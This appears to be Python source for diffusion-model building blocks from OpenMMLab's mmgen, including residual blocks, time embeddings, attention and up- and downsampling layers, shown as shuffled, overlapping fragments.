num_groups=32)`. act_cfg (dict, optional): Config for the activation", "for downsampling operation. Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature", "self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x", "map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale, shift", "\"\"\"Forward function for downsampling operation. Args: x (torch.Tensor): Feature map to downsample. Returns:", "to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer.", "(int): Number of channels of the input feature map. embedding_channels (int): Number of", "dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2", "in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x = layer(x)", "None] if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x) x", "the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU function is also known", "* 3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel", "out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm,", "downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising", "Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift:", "None, None] if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x)", "TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two level embedding. First embedding time by", "split to 'scale' and 'shift' and map the output of normalization layer to", "(c) OpenMMLab. All rights reserved. from copy import deepcopy from functools import partial", "sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape as", "network. Allows users to apply an additional convolution layer after the nearest interpolation", "Feature map to upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\" x =", "the input feature map to be downsampled. with_conv (bool, optional): Whether use convolution", "tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ < '1.6.0': return x", "nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1,", "build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if use_scale_shift else in_channels self.embedding_layer =", "use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of the dropout layers. out_channels", "is None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1", "scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q * scale, k *", "forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y): \"\"\"Forward", "padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ], ('Only", "config for the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The", "return (h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module):", "will be chunked and used to re-shift and re-scale normalization results. Otherwise, embedding", "if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def", "act_cfg (dict, optional): Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def", "with conv layers will be added. Args: in_channels (int): Number of channels of", "for downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv:", "multi head attention. Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map", "for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config for", "embedding time by an embedding function, then feed to neural networks. Args: in_channels", "from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential", "embedding_channels (int): Number of channels of the input embedding. use_scale_shift_norm (bool): Whether use", "conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN',", "* scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight,", "swish function. Args: input (bool, optional): Use inplace operation or not. Defaults to", "qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return", "the embeddings. Defaults to ``10000``. Returns: torch.Tensor: Embedding results shape as `[bz, dim]`.", "partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN` for time embedding, ' f'but receive", "in_channels (int): Channels of the input feature map. num_heads (int, optional): Number of", "* torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial", "Returns: torch.Tensor: Feature map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling", "``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for the shortcut conv. Defaults", "map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in", "use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels,", "act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add", "num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is None else", "embedding layer. Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return", "channels of the ResBlock. If not defined, the output channels will equal to", "function for downsampling operation. Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor:", "the output of Embedding layer will be added with the input before normalization", "3 ], ('Only support `1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.')", "SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU function is", "== True`, embedding results will be chunked and used to re-shift and re-scale", "supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self,", "be split to 'scale' and 'shift' and map the output of normalization layer", "in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function for upsampling operation. Args:", "= x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1,", "forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor:", "// 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args", "1 if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size,", "Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for the activation layers.", "not. Defaults to `False`. \"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0'", "use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y):", "= self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return", "timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape as ``[bz,", "self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation. Args: x", "timestep embeddings to the children that support it as an extra input. Modified", "k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return", "= in_channels if out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1", "Config for normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1,", "QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k, v = torch.chunk(qkv, 3, dim=1)", "for the denoising network. If `in_channels` not equals to `out_channels`, a learnable shortcut", "y): for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else:", "Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ < '1.6.0': return", "nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q,", "act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output", "MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend to each other. Originally", "t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class", "(int, optional): The kernel size for the shortcut conv. Defaults to ``1``. \"\"\"", "to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__()", "(int): The channel number of the input feature map. embedding_channels (int): The channel", "convolution layer after the nearest interpolation operation. Args: in_channels (int): Number of channels", "*spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to", "import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder", "nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config embedding_cfg_ =", "If `in_channels` not equals to `out_channels`, a learnable shortcut with conv layers will", "embedding. norm_cfg (dict, optional): Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`.", "= nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ], ('Only support `1` and", "torch.Tensor: Embedding results shape as `[bz, dim]`. \"\"\" half = dim // 2", "= build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1)", "downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample", "2, dim=1) x = self.norm(x) x = x * (1 + scale) +", "optional): Config for normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels,", "sequential module that passes timestep embeddings to the children that support it as", "freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:,", "2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self,", "Support average pooling and convolution for downsample operation. Args: in_channels (int): Number of", "def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift", "\"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3,", "def init_weights(self): # apply zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module()", "end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args),", "operation. Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map after", "layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU',", "@MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network. Support average pooling", "dim]`. \"\"\" half = dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0,", "embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels)", "torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ < '1.6.0': return x * torch.sigmoid(x)", "last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If", "= build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ]", "x def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature map", "`True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels,", "the input feature map to be downsampled. with_conv (bool, optional): Whether apply an", "feed to neural networks. Args: in_channels (int): The channel number of the input", "self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If `in_channels` not equals", "in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output))", "x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ <", "None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding", "of channels of the input feature map. embedding_channels (int) Number of channels of", "super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1)", "(int): Channels of the input feature map. num_heads (int, optional): Number of heads", "self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3,", "x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\"", "__init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _,", "True, the output of Embedding layer will be split to 'scale' and 'shift'", "1, 3 ], ('Only support `1` and `3` for `shortcut_kernel_size`, but ' f'receive", "``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False),", "embedding layer. If `use_scale_shift == True`, embedding results will be chunked and used", "(torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\" return", "\"\"\" half = dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half,", "operation for downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if", "def forward(self, t): \"\"\"Forward function for time embedding layer. Args: t (torch.Tensor): Input", "in_channels) embedding_output = in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential(", "the output of normalization layer to ``out * (1 + scale) + shift``.", "dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device)", "def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm =", "input feature map to be downsampled. with_conv (bool, optional): Whether use convolution operation", "layer(x, y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the", "is not supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace", "'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults to None. act_cfg (dict,", "inplace operation or not. Defaults to `False`. \"\"\" def __init__(self, inplace=False): super().__init__() if", "in the denoising network. Allows users to apply an additional convolution layer after", "to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels,", "Channels of the input feature map. num_heads (int, optional): Number of heads in", "class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network. Allows users to apply", "+ embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising", "= torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function", "to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for the shortcut conv.", "Whether use convolution operation for downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels,", "norm_cfg (dict, optional): The config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``.", "(torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\" x", "= torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): \"\"\"Forward function for multi", "3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self,", "constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two level embedding.", "an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer", "qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1])", "Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ < '1.6.0': return x *", "input embedding. norm_cfg (dict, optional): Config for the normalization operation. Defaults to `dict(type='GN',", "`True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv", "-1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h)", "normalization operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU',", "partial import mmcv import numpy as np import torch import torch.nn as nn", "' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1", "Number of heads in the attention. norm_cfg (dict, optional): Config for normalization layer.", "Args: in_channels (int): The channel number of the input feature map. embedding_channels (int):", "optional): The config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict,", "= torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q", "self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d(", "else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [", "layer. Args: in_channels (int): Number of channels of the input feature map. embedding_channels", "[embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function for time", "q, k, v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight", "return x + shortcut def init_weights(self): # apply zero init to last conv", "users to apply an additional convolution layer after the nearest interpolation operation. Args:", "x.shape x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b *", "self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x):", "\"\"\" shortcut = self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x =", "nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation. Args: x (torch.Tensor): Feature", "(h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time", "out_channels = in_channels if out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg) _,", "(torch.Tensor): Shared time embedding or shared label embedding. Returns: torch.Tensor : Output feature", "\"\"\"Resblock for the denoising network. If `in_channels` not equals to `out_channels`, a learnable", "ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import", "super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not", "after upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv:", "if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else 0 self.shortcut =", "dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)],", "dropout (float): Probability of the dropout layers. out_channels (int, optional): Number of output", "(int): The channel number of the output embedding. embedding_mode (str, optional): Embedding mode", "* torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding", "or shared label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" shortcut", "3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel =", "(dict, optional): Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self,", "zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with", "feature map. embedding_channels (int) Number of channels of the input embedding. norm_cfg (dict,", "torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function for", "\"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv =", "channel number of the output embedding. embedding_mode (str, optional): Embedding mode for the", "h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return (h + x).reshape(b, c,", "scale) + shift``. Otherwise, the output of Embedding layer will be added with", "Input feature map. Returns: torch.Tensor: Feature map after attention. \"\"\" b, c, *spatial", "number of the output embedding. embedding_mode (str, optional): Embedding mode for the time", "\\'SiLU\\' is not supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace =", "https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y): for layer in self: if isinstance(layer, DenoisingResBlock):", "= in_channels * 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels,", "{embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor):", "of the input feature map. embedding_channels (int) Number of channels of the input", "x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor", "First embedding time by an embedding function, then feed to neural networks. Args:", "= nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation. Args: x (torch.Tensor):", "nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def", "the dropout layers. out_channels (int, optional): Number of output channels of the ResBlock.", "function for multi head attention. Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor:", "the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for", "mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings", "inplace=False)`. use_scale_shift (bool): If True, the output of Embedding layer will be split", "forward(self, x, y): for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x,", "ResBlock. If not defined, the output channels will equal to the `in_channels`. Defaults", "Number of output channels of the ResBlock. If not defined, the output channels", "map after attention. \"\"\" b, c, *spatial = x.shape x = x.reshape(b, c,", "passes timestep embeddings to the children that support it as an extra input.", "shape as `[bz, dim]`. \"\"\" half = dim // 2 freqs = torch.exp(", "def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels,", "map to upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\" x = F.interpolate(x,", "3, 1, 1) def forward(self, x): \"\"\"Forward function for upsampling operation. Args: x", "3 q, k, v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel))", "forward(self, x): \"\"\"Forward function for downsampling operation. Args: x (torch.Tensor): Feature map to", "out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x", "build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A", "map. Returns: torch.Tensor: Feature map after attention. \"\"\" b, c, *spatial = x.shape", "of output channels of the ResBlock. If not defined, the output channels will", "mmcv import numpy as np import torch import torch.nn as nn import torch.nn.functional", "Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True):", "if self.use_scale_shift: scale, shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x) x =", "conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift", "(int): The dimension of the embedding. max_period (int, optional): Controls the minimum frequency", "'1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for ' f'torch", "embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper()", "upsampling operation. Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map", "* (1 + scale) + shift else: x = self.norm(x + embedding) return", "* (1 + scale) + shift``. Otherwise, the output of Embedding layer will", "args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim", "dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels", "downsampled. with_conv (bool, optional): Whether apply an additional convolution layer after upsampling. Defaults", "nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg)", "< 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self, x): \"\"\"Forward function for", "norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict(", "If True, the output of Embedding layer will be split to 'scale' and", "x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network. Support average", "dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [", "inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is", "channels of the input feature map. embedding_channels (int): Number of channels of the", "return weight def forward(self, x): \"\"\"Forward function for multi head attention. Args: x", "f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1 if", "\"\"\"Forward function for multi head attention. Args: x (torch.Tensor): Input feature map. Returns:", "build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels,", "scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v)", "= self.norm(x) x = x * (1 + scale) + shift else: x", "timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape as ``[bz, ]``, one per", "torch.einsum('bct,bcs->bts', q * scale, k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight =", "The dimension of the embedding. max_period (int, optional): Controls the minimum frequency of", "`False`. \"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace", "x = self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x +", "def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of", "build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ]", "else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward", "half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if", "be added with the input before normalization operation. Defaults to True. \"\"\" def", "2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t):", "input before normalization operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, 